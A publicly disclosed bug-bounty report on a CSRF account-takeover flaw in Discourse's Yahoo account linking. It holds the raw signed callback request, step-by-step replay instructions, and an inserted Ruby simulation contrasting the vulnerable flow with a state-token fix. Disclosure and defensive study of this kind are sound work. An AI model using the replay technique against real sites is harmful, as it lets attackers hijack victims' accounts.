Account takeover at https://try.discourse.org due to no CSRF protection in connecting Yahoo account
State Resolved (Closed)
Disclosed publicly 2018-12-06T02:35:56.686Z
Weakness Cross-Site Request Forgery (CSRF)
Bounty $512


Timeline
avinash_ submitted a report to Discourse.
2018-10-12T16:57:57.640Z

Hi

There is an option at https://try.discourse.org/u/testh1ay/preferences/account to connect our Yahoo account.

I noticed that the Connect Yahoo account option has a workflow using the GET method and that there is no CSRF protection when connecting a Yahoo account. This lets an attacker induce a victim into connecting the attacker's Yahoo account to the victim's Discourse account, which leads to full takeover of the victim's account.

Vulnerable Request:

```http
GET /auth/yahoo/callback?_method=post&openid.ns=http%3A%2F%2Fspecs.openid.net%2Fauth%2F2.0&openid.mode=id_res&openid.return_to=https%3A%2F%2Ftry.discourse.org%2Fauth%2Fyahoo%2Fcallback%3F_method%3Dpost&openid.claimed_id=https%3A%2F%2Fme.yahoo.com%2Fa%2F7qAAT.abcd&openid.identity=https%3A%2F%2Fme.yahoo.com%2Fa%2F7qAAT.abcd&openid.realm=https%3A%2F%2Ftry.discourse.org&openid.ns.ax=http%3A%2F%2Fopenid.net%2Fsrv%2Fax%2F1.0&openid.ax.mode=fetch_response&openid.ax.value.email=testhackeroneay%40yahoo.com&openid.ax.value.fullname=test%20hackerone&openid.ax.value.nickname=test&openid.assoc_handle=abcd&openid.response_nonce=2018-10-12T16%3A27%defg-&openid.signed=assoc_handle%2Cclaimed_id%2Cidentity%2Cmode%2Cns%2Cop_endpoint%2Cresponse_nonce%2Creturn_to%2Csigned%2Cax.value.email%2Cax.type.email%2Cax.value.fullname%2Cax.type.fullname%2Cax.value.nickname%2Cax.type.nickname%2Cns.ax%2Cax.mode%2Cpape.auth_level.nist&openid.op_endpoint=https%3A%2F%2Fopen.login.yahooapis.com%2Fopenid%2Fop%2Fauth&openid.ax.type.email=http%3A%2F%2Faxschema.org%2Fcontact%2Femail&openid.ax.type.fullname=http%3A%2F%2Faxschema.org%2FnamePerson&openid.ax.type.nickname=http%3A%2F%2Faxschema.org%2FnamePerson%2Ffriendly&openid.pape.auth_level.nist=0&openid.sig=9p%2Bxyz HTTP/1.1
Host: try.discourse.org
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:60.0) Gecko/20100101 Firefox/60.0
```

Steps to reproduce:

  1. Attacker goes to https://try.discourse.org/u/user/preferences/account
  2. Switch on the Burp interceptor and click on Yahoo connect.
  3. Go to the Burp interceptor; after forwarding some requests the attacker will find the vulnerable request shown above.
  4. Copy that and drop the request (here you have saved the auth token generated by Yahoo).
  5. Now feed the copied request to an authenticated victim (as an HTML form or as a URL).
  6. The victim gets the message "authentication complete" and is redirected to https://try.discourse.org/?authComplete=true.
  7. Attacker opens his browser and tries to log in with Yahoo.
  8. Attacker gets redirected to https://try.discourse.org/auth/yahoo/null
  9. Attacker opens https://try.discourse.org
  10. Check: the victim's account is successfully compromised.

Impact

Account Takeover.

Regards,
Frans

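The flaw in the report is that the callback request carries a complete, genuinely signed assertion for the attacker's Yahoo identity, and nothing ties that assertion to the browser session that started the "connect" flow, so it can be replayed in the victim's logged-in session. The reporter's follow-up notes that the fix shipped as a `state` value issued when the flow starts. The Ruby below is an added example, not Discourse's or the reporter's code: a constructed stand-in identity provider (`FakeOpenIdProvider`, HMAC instead of a real OpenID association) signs assertions over the identity and `openid.return_to`; `ConnectAccountFlow` shows the unbound callback beside one that binds a one-time `state` held in the session to the state carried in the signed `return_to`. The class names, the `state` parameter name, the session layout and all identities and emails are assumptions made for the example.

```ruby
require 'securerandom'
require 'openssl'

# Constant-time comparison so the state check does not leak via timing.
def ct_equal?(a, b)
  return false unless a.bytesize == b.bytesize
  a.bytes.zip(b.bytes).reduce(0) { |acc, (x, y)| acc | (x ^ y) }.zero?
end

# Constructed stand-in for the identity provider (Yahoo's OpenID OP in the
# report). It signs the assertion fields, return_to included, with an HMAC.
# A valid signature proves the assertion is genuine for the identity it names;
# it says nothing about which browser session started the flow.
class FakeOpenIdProvider
  def initialize
    @key = SecureRandom.bytes(32)
  end

  def assert(identity:, email:, return_to:)
    params = { 'openid.identity' => identity,
               'openid.ax.value.email' => email,
               'openid.return_to' => return_to }
    params.merge('openid.sig' => sign(params))
  end

  def valid?(params)
    sig = params['openid.sig']
    !sig.nil? && ct_equal?(sig, sign(params.reject { |k, _| k == 'openid.sig' }))
  end

  private

  def sign(params)
    OpenSSL::HMAC.hexdigest('SHA256', @key, params.sort.map { |k, v| "#{k}=#{v}" }.join('&'))
  end
end

# Minimal model of the "connect Yahoo account" step. A session is a Hash for a
# logged-in user; linking stores the asserted identity in it.
class ConnectAccountFlow
  CALLBACK = 'https://try.discourse.org/auth/yahoo/callback'.freeze # assumed path

  def initialize(provider)
    @provider = provider
  end

  # Vulnerable: any correctly signed assertion delivered to a logged-in session
  # is linked, so an assertion the attacker obtained for their own identity can
  # be replayed in the victim's browser via a GET link or an HTML form.
  def callback_without_state(session, params)
    return :bad_signature unless @provider.valid?(params)
    session[:linked_identity] = params['openid.identity']
    :linked
  end

  # Hardened: starting the flow puts a random one-time state in the session and
  # in return_to (which the provider signs). The callback links only when the
  # state inside the signed return_to matches the state of the session that
  # started the flow, so a replayed assertion fails in any other session.
  def start_with_state(session)
    session[:oauth_state] = SecureRandom.hex(16)
    "#{CALLBACK}?state=#{session[:oauth_state]}"
  end

  def callback_with_state(session, params)
    return :bad_signature unless @provider.valid?(params)
    expected = session.delete(:oauth_state) # single use
    presented = params['openid.return_to'].to_s[/[?&]state=([0-9a-f]+)/, 1]
    return :state_mismatch unless expected && presented && ct_equal?(expected, presented)
    session[:linked_identity] = params['openid.identity']
    :linked
  end
end

ATTACKER_ID = 'https://me.yahoo.com/a/attacker'.freeze # constructed identity

# Steps 1-6 of the report: the attacker completes the provider side, captures
# the callback, and delivers it to the victim's authenticated session.
def replay_attack(hardened:)
  provider = FakeOpenIdProvider.new
  flow = ConnectAccountFlow.new(provider)
  attacker_session = { user: 'attacker' }
  victim_session = { user: 'victim' }
  return_to = hardened ? flow.start_with_state(attacker_session) : ConnectAccountFlow::CALLBACK
  captured = provider.assert(identity: ATTACKER_ID, email: 'attacker@example.com', return_to: return_to)
  handler = hardened ? :callback_with_state : :callback_without_state
  [flow.public_send(handler, victim_session, captured), victim_session[:linked_identity]]
end

# Control: the hardened flow still links when one session starts and finishes
# it, and a return_to whose state was edited after signing fails the signature.
def hardened_legitimate_and_tampered
  provider = FakeOpenIdProvider.new
  flow = ConnectAccountFlow.new(provider)
  session = { user: 'victim' }
  assertion = provider.assert(identity: 'https://me.yahoo.com/a/victim', email: 'v@example.com',
                              return_to: flow.start_with_state(session))
  ok = flow.callback_with_state(session, assertion)
  other = { user: 'other' }
  forged = assertion.merge('openid.return_to' => flow.start_with_state(other))
  [ok, flow.callback_with_state(other, forged)]
end
```

`replay_attack(hardened: false)` returns `[:linked, ATTACKER_ID]`, which is the account takeover from the report; `replay_attack(hardened: true)` returns `[:state_mismatch, nil]` because the victim's session never issued the state embedded in the attacker's signed `return_to`, and `hardened_legitimate_and_tampered` returns `[:linked, :bad_signature]`. The state is deleted from the session on first use so a captured callback cannot be replayed even into the session that started it.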
avinash_ Activities::Comment
2018-10-27T13:21:13.595Z
Anybody to respond?


ktistai Activities::Comment
2018-10-31T09:32:54.873Z
Hi @avinash_ , Thanks for your submission. We are currently reviewing your report and will get back to you once we have additional information to share. Kind regards, @ktistai


ktistai Activities::BugTriaged
2018-10-31T10:03:11.606Z
Hi @avinash_ Thank you for your submission! We were able to validate your report, and we have submitted it to the appropriate remediation team for review. They will let us know the final ruling on this report, and if/when a fix will be implemented. Please note that the status and severity are subject to change. Thanks, @ktistai


avinash_ Activities::Comment
2018-11-03T13:27:06.632Z
Hi @ktistai It seems fixed. On connecting a Yahoo account it is now issuing a CSRF token (as state=token123). When reproducing the attack it gives the error message ```Sorry, there was an error authorizing your account. Perhaps you did not approve authorization?```. Can you please check this from your end! Best Regards


discourse_team Activities::BugResolved
2018-11-05T21:09:23.848Z


Activities::BountyAwarded
2018-11-05T21:09:31.018Z


avinash_ Activities::Comment
2018-11-06T02:32:57.775Z
Hi @discourse_team Thanks for bounty :) Best Regards


avinash_ Activities::AgreedOnGoingPublic
2018-11-06T02:35:42.043Z
Pretty nice bug... Can we please disclose this?


Activities::ReportBecamePublic
2018-12-06T02:35:56.704Z